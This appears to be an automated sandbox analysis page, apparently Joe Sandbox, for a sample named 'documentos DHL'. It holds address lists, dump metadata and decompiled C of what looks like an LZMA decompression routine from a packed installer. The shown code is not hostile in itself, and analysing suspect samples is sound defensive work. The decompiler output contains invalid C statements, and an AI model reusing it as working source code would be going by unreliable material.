0x0040721f
0x0040721f
0x0040721f
0x00407222
0x00407222
0x00407226
0x00407286
0x00407289
0x0040728e
0x0040728f
0x00407291
0x00407293
0x00407296
0x00000000
0x00407296
0x00407228
0x0040722e
0x00407231
0x00407234
0x00407237
0x0040723a
0x0040723d
0x00407240
0x00407243
0x00407246
0x00407249
0x00407262
0x00407265
0x00407268
0x0040726b
0x0040726f
0x00407271
0x00407271
0x00407272
0x00407275
0x0040724b
0x0040724b
0x00407253
0x00407258
0x0040725a
0x0040725d
0x0040725d
0x00407278
0x0040727f
0x00000000
0x00407281
0x00000000
0x00407281
0x00000000
0x00406f1d
0x00406f20
0x00406f56
0x00407086
0x00407086
0x00407086
0x00407086
0x00407089
0x00407089
0x0040708c
0x0040708e
0x00407318
0x00000000
0x00407318
0x00407094
0x00407097
0x00000000
0x00000000
0x0040709d
0x004070a1
0x004070a4
0x004070a4
0x004070a4
0x00000000
0x004070a4
0x00406f22
0x00406f24
0x00406f26
0x00406f28
0x00406f2b
0x00406f2c
0x00406f2e
0x00406f30
0x00406f33
0x00406f36
0x00406f4c
0x00406f51
0x00406f89
0x00406f89
0x00406f8d
0x00406fb9
0x00406fbb
0x00406fc2
0x00406fc5
0x00406fc8
0x00406fc8
0x00406fcd
0x00406fcd
0x00406fcf
0x00406fd2
0x00406fd9
0x00406fdc
0x00407009
0x00407009
0x0040700c
0x0040700f
0x00407083
0x00407083
0x00407083
0x00000000
0x00407083
0x00407011
0x00407017
0x0040701a
0x0040701d
0x00407020
0x00407023
0x00407026
0x00407029
0x0040702c
0x0040702f
0x00407032
0x0040704b
0x0040704d
0x00407050
0x00407051
0x00407054
0x00407056
0x00407059
0x0040705b
0x0040705d
0x00407060
0x00407062
0x00407065
0x00407069
0x0040706b
0x0040706b
0x0040706c
0x0040706f
0x00407072
0x00407034
0x00407034
0x0040703c
0x00407041
0x00407043
0x00407046
0x00407046
0x00407075
0x0040707c
0x00407006
0x00407006
0x00407006
0x00407006
0x00000000
0x0040707e
0x00000000
0x0040707e
0x0040707c
0x00406f8f
0x00406f92
0x00406f94
0x00406f97
0x00406f9a
0x00406f9d
0x00406f9f
0x00406fa2
0x00406fa5
0x00406fa5
0x00406fa8
0x00406fa8
0x00406fab
0x00406fb2
0x00406f86
0x00406f86
0x00406f86
0x00406f86
0x00000000
0x00406fb4
0x00000000
0x00406fb4
0x00406fb2
0x00406f38
0x00406f3b
0x00406f3d
0x00406f40
0x00000000
0x00000000
0x00406c9f
0x00406c9f
0x00406ca3
0x004072e8
0x00000000
0x004072e8
0x00406ca9
0x00406cac
0x00406caf
0x00406cb2
0x00406cb5
0x00406cb8
0x00406cbb
0x00406cbd
0x00406cc0
0x00406cc3
0x00406cc6
0x00406cc8
0x00406cc8
0x00406cc8
0x00000000
0x00000000
0x00000000
0x00000000
0x004070a7
0x004070a7
0x004070a7
0x004070ab
0x00000000
0x00000000
0x004070b1
0x004070b4
0x004070b7
0x004070ba
0x004070bc
0x004070bc
0x004070bc
0x004070bf
0x004070c2
0x004070c5
0x004070c8
0x004070cb
0x004070ce
0x004070cf
0x004070d1
0x004070d1
0x004070d1
0x004070d4
0x004070d7
0x004070da
0x004070dd
0x004070e0
0x004070e4
0x004070e6
0x004070e9
0x00000000
0x004070eb
0x00000000
0x004070eb
0x004070e9
0x0040731e
0x00000000
0x00000000
0x0040694d

Memory Dump Source

Source File: 00000002.00000002.1820909988.0000000000401000.00000020.00000001.01000000.00000004.sdmp, Offset: 00400000, based on PE: true

Associated: 00000002.00000002.1820872214.0000000000400000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1820984430.0000000000408000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821027075.000000000040A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821226779.0000000000425000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821266703.0000000000427000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821304765.000000000042B000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821344173.000000000042D000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821385079.0000000000435000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821445216.000000000045A000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821491503.000000000045E000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1821620297.000000000046E000.00000002.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_400000_documentos DHL.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
Instruction ID: 6e186065c07e551db02da0b657444ed8a40fac9cbefa0218a87430385e41b7b0
Opcode Fuzzy Hash: 36b8550c79165f3bd8438b4b7b77fc639822643401bcc62ffa2a7152ccecd571
Instruction Fuzzy Hash: F7814571E04228CFDF24CFA8C8447ADBBB1FB45305F24816AD856BB281C778A996DF45

Uniqueness

Uniqueness Score: -1.00%

Function 00406D59 Relevance: 5.2, APIs: 4, Instructions: 180
COMMON

Download Yara Rule

C-Code - Quality: 98%

			E00406D59() {
				signed int _t539;
				unsigned short _t540;
				signed int _t541;
				void _t542;
				signed int _t543;
				signed int _t544;
				signed int _t573;
				signed int _t576;
				signed int _t597;
				signed int* _t614;
				void* _t621;

				L0:
				while(1) {
					L0:
					if( *(_t621 - 0x40) != 1) {
						 *((intOrPtr*)(_t621 - 0x80)) = 0x16;
						 *((intOrPtr*)(_t621 - 0x20)) =  *((intOrPtr*)(_t621 - 0x24));
						 *((intOrPtr*)(_t621 - 0x24)) =  *((intOrPtr*)(_t621 - 0x28));
						 *((intOrPtr*)(_t621 - 0x28)) =  *((intOrPtr*)(_t621 - 0x2c));
						 *(_t621 - 0x38) = ((0 |  *(_t621 - 0x38) - 0x00000007 >= 0x00000000) - 0x00000001 & 0x000000fd) + 0xa;
						_t539 =  *(_t621 - 4) + 0x664;
						 *(_t621 - 0x58) = _t539;
						goto L68;
					} else {
						 *(__ebp - 0x84) = 8;
						while(1) {
							L132:
							 *(_t621 - 0x54) = _t614;
							while(1) {
								L133:
								_t540 =  *_t614;
								_t597 = _t540 & 0x0000ffff;
								_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
								if( *(_t621 - 0xc) >= _t573) {
									 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
									 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
									 *(_t621 - 0x40) = 1;
									_t541 = _t540 - (_t540 >> 5);
									 *_t614 = _t541;
								} else {
									 *(_t621 - 0x10) = _t573;
									 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
									 *_t614 = (0x800 - _t597 >> 5) + _t540;
								}
								if( *(_t621 - 0x10) >= 0x1000000) {
									goto L139;
								}
								L137:
								if( *(_t621 - 0x6c) == 0) {
									 *(_t621 - 0x88) = 5;
									L170:
									_t576 = 0x22;
									memcpy( *(_t621 - 0x90), _t621 - 0x88, _t576 << 2);
									_t544 = 0;
									L172:
									return _t544;
								}
								 *(_t621 - 0x10) =  *(_t621 - 0x10) << 8;
								 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
								 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
								 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
								L139:
								_t542 =  *(_t621 - 0x84);
								while(1) {
									 *(_t621 - 0x88) = _t542;
									while(1) {
										L1:
										_t543 =  *(_t621 - 0x88);
										if(_t543 > 0x1c) {
											break;
										}
										switch( *((intOrPtr*)(_t543 * 4 +  &M0040735D))) {
											case 0:
												if( *(_t621 - 0x6c) == 0) {
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t543 =  *( *(_t621 - 0x70));
												if(_t543 > 0xe1) {
													goto L171;
												}
												_t547 = _t543 & 0x000000ff;
												_push(0x2d);
												asm("cdq");
												_pop(_t578);
												_push(9);
												_pop(_t579);
												_t617 = _t547 / _t578;
												_t549 = _t547 % _t578 & 0x000000ff;
												asm("cdq");
												_t612 = _t549 % _t579 & 0x000000ff;
												 *(_t621 - 0x3c) = _t612;
												 *(_t621 - 0x1c) = (1 << _t617) - 1;
												 *((intOrPtr*)(_t621 - 0x18)) = (1 << _t549 / _t579) - 1;
												_t620 = (0x300 << _t612 + _t617) + 0x736;
												if(0x600 ==  *((intOrPtr*)(_t621 - 0x78))) {
													L10:
													if(_t620 == 0) {
														L12:
														 *(_t621 - 0x48) =  *(_t621 - 0x48) & 0x00000000;
														 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
														goto L15;
													} else {
														goto L11;
													}
													do {
														L11:
														_t620 = _t620 - 1;
														 *((short*)( *(_t621 - 4) + _t620 * 2)) = 0x400;
													} while (_t620 != 0);
													goto L12;
												}
												if( *(_t621 - 4) != 0) {
													GlobalFree( *(_t621 - 4));
												}
												_t543 = GlobalAlloc(0x40, 0x600); // executed
												 *(_t621 - 4) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													 *((intOrPtr*)(_t621 - 0x78)) = 0x600;
													goto L10;
												}
											case 1:
												L13:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 1;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												 *(_t621 - 0x40) =  *(_t621 - 0x40) | ( *( *(_t621 - 0x70)) & 0x000000ff) <<  *(_t621 - 0x48) << 0x00000003;
												 *(_t621 - 0x70) =  &(( *(_t621 - 0x70))[1]);
												_t45 = _t621 - 0x48;
												 *_t45 =  *(_t621 - 0x48) + 1;
												__eflags =  *_t45;
												L15:
												if( *(_t621 - 0x48) < 4) {
													goto L13;
												}
												_t555 =  *(_t621 - 0x40);
												if(_t555 ==  *(_t621 - 0x74)) {
													L20:
													 *(_t621 - 0x48) = 5;
													 *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) =  *( *(_t621 - 8) +  *(_t621 - 0x74) - 1) & 0x00000000;
													goto L23;
												}
												 *(_t621 - 0x74) = _t555;
												if( *(_t621 - 8) != 0) {
													GlobalFree( *(_t621 - 8));
												}
												_t543 = GlobalAlloc(0x40,  *(_t621 - 0x40)); // executed
												 *(_t621 - 8) = _t543;
												if(_t543 == 0) {
													goto L171;
												} else {
													goto L20;
												}
											case 2:
												L24:
												_t562 =  *(_t621 - 0x60) &  *(_t621 - 0x1c);
												 *(_t621 - 0x84) = 6;
												 *(_t621 - 0x4c) = _t562;
												_t614 =  *(_t621 - 4) + (( *(_t621 - 0x38) << 4) + _t562) * 2;
												goto L132;
											case 3:
												L21:
												__eflags =  *(_t621 - 0x6c);
												if( *(_t621 - 0x6c) == 0) {
													 *(_t621 - 0x88) = 3;
													goto L170;
												}
												 *(_t621 - 0x6c) =  *(_t621 - 0x6c) - 1;
												_t67 = _t621 - 0x70;
												 *_t67 =  &(( *(_t621 - 0x70))[1]);
												__eflags =  *_t67;
												 *(_t621 - 0xc) =  *(_t621 - 0xc) << 0x00000008 |  *( *(_t621 - 0x70)) & 0x000000ff;
												L23:
												 *(_t621 - 0x48) =  *(_t621 - 0x48) - 1;
												if( *(_t621 - 0x48) != 0) {
													goto L21;
												}
												goto L24;
											case 4:
												L133:
												_t540 =  *_t614;
												_t597 = _t540 & 0x0000ffff;
												_t573 = ( *(_t621 - 0x10) >> 0xb) * _t597;
												if( *(_t621 - 0xc) >= _t573) {
													 *(_t621 - 0x10) =  *(_t621 - 0x10) - _t573;
													 *(_t621 - 0xc) =  *(_t621 - 0xc) - _t573;
													 *(_t621 - 0x40) = 1;
													_t541 = _t540 - (_t540 >> 5);
													 *_t614 = _t541;
												} else {
													 *(_t621 - 0x10) = _t573;
													 *(_t621 - 0x40) =  *(_t621 - 0x40) & 0x00000000;
													 *_t614 = (0x800 - _t597 >> 5) + _t540;
												}
												if( *(_t621 - 0x10) >= 0x1000000) {
													goto L139;
												}
											case 5:
												goto L137;
											case 6:
												__edx = 0;
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x34) = 1;
													 *(__ebp - 0x84) = 7;
													__esi =  *(__ebp - 4) + 0x180 +  *(__ebp - 0x38) * 2;
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
												__eax =  *(__ebp - 0x5c) & 0x000000ff;
												__esi =  *(__ebp - 0x60);
												__cl = 8;
												__cl = 8 -  *(__ebp - 0x3c);
												__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
												__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
												__ecx =  *(__ebp - 0x3c);
												__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
												__ecx =  *(__ebp - 4);
												(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
												__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
												__eflags =  *(__ebp - 0x38) - 4;
												__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
												if( *(__ebp - 0x38) >= 4) {
													__eflags =  *(__ebp - 0x38) - 0xa;
													if( *(__ebp - 0x38) >= 0xa) {
														_t98 = __ebp - 0x38;
														 *_t98 =  *(__ebp - 0x38) - 6;
														__eflags =  *_t98;
													} else {
														 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
													}
												} else {
													 *(__ebp - 0x38) = 0;
												}
												__eflags =  *(__ebp - 0x34) - __edx;
												if( *(__ebp - 0x34) == __edx) {
													__ebx = 0;
													__ebx = 1;
													goto L61;
												} else {
													__eax =  *(__ebp - 0x14);
													__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
													__eflags = __eax -  *(__ebp - 0x74);
													if(__eax >=  *(__ebp - 0x74)) {
														__eax = __eax +  *(__ebp - 0x74);
														__eflags = __eax;
													}
													__ecx =  *(__ebp - 8);
													__ebx = 0;
													__ebx = 1;
													__al =  *((intOrPtr*)(__eax + __ecx));
													 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
													goto L41;
												}
											case 7:
												goto L0;
											case 8:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xa;
													__esi =  *(__ebp - 4) + 0x1b0 +  *(__ebp - 0x38) * 2;
												} else {
													__eax =  *(__ebp - 0x38);
													__ecx =  *(__ebp - 4);
													__eax =  *(__ebp - 0x38) + 0xf;
													 *(__ebp - 0x84) = 9;
													 *(__ebp - 0x38) + 0xf << 4 = ( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c);
													__esi =  *(__ebp - 4) + (( *(__ebp - 0x38) + 0xf << 4) +  *(__ebp - 0x4c)) * 2;
												}
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 9:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													goto L89;
												}
												__eflags =  *(__ebp - 0x60);
												if( *(__ebp - 0x60) == 0) {
													goto L171;
												}
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												_t258 =  *(__ebp - 0x38) - 7 >= 0;
												__eflags = _t258;
												0 | _t258 = _t258 + _t258 + 9;
												 *(__ebp - 0x38) = _t258 + _t258 + 9;
												goto L75;
											case 0xa:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 4);
													__ecx =  *(__ebp - 0x38);
													 *(__ebp - 0x84) = 0xb;
													__esi =  *(__ebp - 4) + 0x1c8 +  *(__ebp - 0x38) * 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x28);
												goto L88;
											case 0xb:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__ecx =  *(__ebp - 0x24);
													__eax =  *(__ebp - 0x20);
													 *(__ebp - 0x20) =  *(__ebp - 0x24);
												} else {
													__eax =  *(__ebp - 0x24);
												}
												__ecx =  *(__ebp - 0x28);
												 *(__ebp - 0x24) =  *(__ebp - 0x28);
												L88:
												__ecx =  *(__ebp - 0x2c);
												 *(__ebp - 0x2c) = __eax;
												 *(__ebp - 0x28) =  *(__ebp - 0x2c);
												L89:
												__eax =  *(__ebp - 4);
												 *(__ebp - 0x80) = 0x15;
												__eax =  *(__ebp - 4) + 0xa68;
												 *(__ebp - 0x58) =  *(__ebp - 4) + 0xa68;
												goto L68;
											case 0xc:
												L99:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xc;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t334 = __ebp - 0x70;
												 *_t334 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t334;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												__eax =  *(__ebp - 0x2c);
												goto L101;
											case 0xd:
												L37:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xd;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t122 = __ebp - 0x70;
												 *_t122 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t122;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L39:
												__eax =  *(__ebp - 0x40);
												__eflags =  *(__ebp - 0x48) -  *(__ebp - 0x40);
												if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
													goto L48;
												}
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													goto L54;
												}
												L41:
												__eax =  *(__ebp - 0x5b) & 0x000000ff;
												 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
												__ecx =  *(__ebp - 0x58);
												__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
												 *(__ebp - 0x48) = __eax;
												__eax = __eax + 1;
												__eax = __eax << 8;
												__eax = __eax + __ebx;
												__esi =  *(__ebp - 0x58) + __eax * 2;
												 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edx = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													 *(__ebp - 0x40) = 1;
													__cx = __ax >> 5;
													__eflags = __eax;
													__ebx = __ebx + __ebx + 1;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edx;
													0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L39;
												} else {
													goto L37;
												}
											case 0xe:
												L46:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xe;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t156 = __ebp - 0x70;
												 *_t156 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t156;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												while(1) {
													L48:
													__eflags = __ebx - 0x100;
													if(__ebx >= 0x100) {
														break;
													}
													__eax =  *(__ebp - 0x58);
													__edx = __ebx + __ebx;
													__ecx =  *(__ebp - 0x10);
													__esi = __edx + __eax;
													__ecx =  *(__ebp - 0x10) >> 0xb;
													__ax =  *__esi;
													 *(__ebp - 0x54) = __esi;
													__edi = __ax & 0x0000ffff;
													__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
													__eflags =  *(__ebp - 0xc) - __ecx;
													if( *(__ebp - 0xc) >= __ecx) {
														 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
														 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
														__cx = __ax;
														_t170 = __edx + 1; // 0x1
														__ebx = _t170;
														__cx = __ax >> 5;
														__eflags = __eax;
														 *__esi = __ax;
													} else {
														 *(__ebp - 0x10) = __ecx;
														0x800 = 0x800 - __edi;
														0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
														__ebx = __ebx + __ebx;
														 *__esi = __cx;
													}
													__eflags =  *(__ebp - 0x10) - 0x1000000;
													 *(__ebp - 0x44) = __ebx;
													if( *(__ebp - 0x10) >= 0x1000000) {
														continue;
													} else {
														goto L46;
													}
												}
												L54:
												_t173 = __ebp - 0x34;
												 *_t173 =  *(__ebp - 0x34) & 0x00000000;
												__eflags =  *_t173;
												goto L55;
											case 0xf:
												L58:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0xf;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t203 = __ebp - 0x70;
												 *_t203 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t203;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												L60:
												__eflags = __ebx - 0x100;
												if(__ebx >= 0x100) {
													L55:
													__al =  *(__ebp - 0x44);
													 *(__ebp - 0x5c) =  *(__ebp - 0x44);
													goto L56;
												}
												L61:
												__eax =  *(__ebp - 0x58);
												__edx = __ebx + __ebx;
												__ecx =  *(__ebp - 0x10);
												__esi = __edx + __eax;
												__ecx =  *(__ebp - 0x10) >> 0xb;
												__ax =  *__esi;
												 *(__ebp - 0x54) = __esi;
												__edi = __ax & 0x0000ffff;
												__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
												__eflags =  *(__ebp - 0xc) - __ecx;
												if( *(__ebp - 0xc) >= __ecx) {
													 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
													 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
													__cx = __ax;
													_t217 = __edx + 1; // 0x1
													__ebx = _t217;
													__cx = __ax >> 5;
													__eflags = __eax;
													 *__esi = __ax;
												} else {
													 *(__ebp - 0x10) = __ecx;
													0x800 = 0x800 - __edi;
													0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
													__ebx = __ebx + __ebx;
													 *__esi = __cx;
												}
												__eflags =  *(__ebp - 0x10) - 0x1000000;
												 *(__ebp - 0x44) = __ebx;
												if( *(__ebp - 0x10) >= 0x1000000) {
													goto L60;
												} else {
													goto L58;
												}
											case 0x10:
												L109:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x10;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
												__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
												 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
												 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												_t365 = __ebp - 0x70;
												 *_t365 =  *(__ebp - 0x70) + 1;
												__eflags =  *_t365;
												 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
												goto L111;
											case 0x11:
												L68:
												_t614 =  *(_t621 - 0x58);
												 *(_t621 - 0x84) = 0x12;
												while(1) {
													L132:
													 *(_t621 - 0x54) = _t614;
													goto L133;
												}
											case 0x12:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													__eax =  *(__ebp - 0x58);
													 *(__ebp - 0x84) = 0x13;
													__esi =  *(__ebp - 0x58) + 2;
													while(1) {
														L132:
														 *(_t621 - 0x54) = _t614;
														goto L133;
													}
												}
												__eax =  *(__ebp - 0x4c);
												 *(__ebp - 0x30) =  *(__ebp - 0x30) & 0x00000000;
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												__eflags = __eax;
												__eax =  *(__ebp - 0x58) + __eax + 4;
												goto L130;
											case 0x13:
												__eflags =  *(__ebp - 0x40);
												if( *(__ebp - 0x40) != 0) {
													_t469 = __ebp - 0x58;
													 *_t469 =  *(__ebp - 0x58) + 0x204;
													__eflags =  *_t469;
													 *(__ebp - 0x30) = 0x10;
													 *(__ebp - 0x40) = 8;
													L144:
													 *(__ebp - 0x7c) = 0x14;
													goto L145;
												}
												__eax =  *(__ebp - 0x4c);
												__ecx =  *(__ebp - 0x58);
												__eax =  *(__ebp - 0x4c) << 4;
												 *(__ebp - 0x30) = 8;
												__eax =  *(__ebp - 0x58) + ( *(__ebp - 0x4c) << 4) + 0x104;
												L130:
												 *(__ebp - 0x58) = __eax;
												 *(__ebp - 0x40) = 3;
												goto L144;
											case 0x14:
												 *(__ebp - 0x30) =  *(__ebp - 0x30) + __ebx;
												__eax =  *(__ebp - 0x80);
												 *(_t621 - 0x88) = _t542;
												goto L1;
											case 0x15:
												__eax = 0;
												__eflags =  *(__ebp - 0x38) - 7;
												0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
												__al = __al & 0x000000fd;
												__eax = (__eflags >= 0) - 1 + 0xb;
												 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xb;
												goto L120;
											case 0x16:
												__eax =  *(__ebp - 0x30);
												__eflags = __eax - 4;
												if(__eax >= 4) {
													_push(3);
													_pop(__eax);
												}
												__ecx =  *(__ebp - 4);
												 *(__ebp - 0x40) = 6;
												__eax = __eax << 7;
												 *(__ebp - 0x7c) = 0x19;
												 *(__ebp - 0x58) = __eax;
												goto L145;
											case 0x17:
												L145:
												__eax =  *(__ebp - 0x40);
												 *(__ebp - 0x50) = 1;
												 *(__ebp - 0x48) =  *(__ebp - 0x40);
												goto L149;
											case 0x18:
												L146:
												__eflags =  *(__ebp - 0x6c);
												if( *(__ebp - 0x6c) == 0) {
													 *(__ebp - 0x88) = 0x18;
													goto L170;
												}
												__ecx =  *(__ebp - 0x70);
												__eax =  *(__ebp - 0xc);
												 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
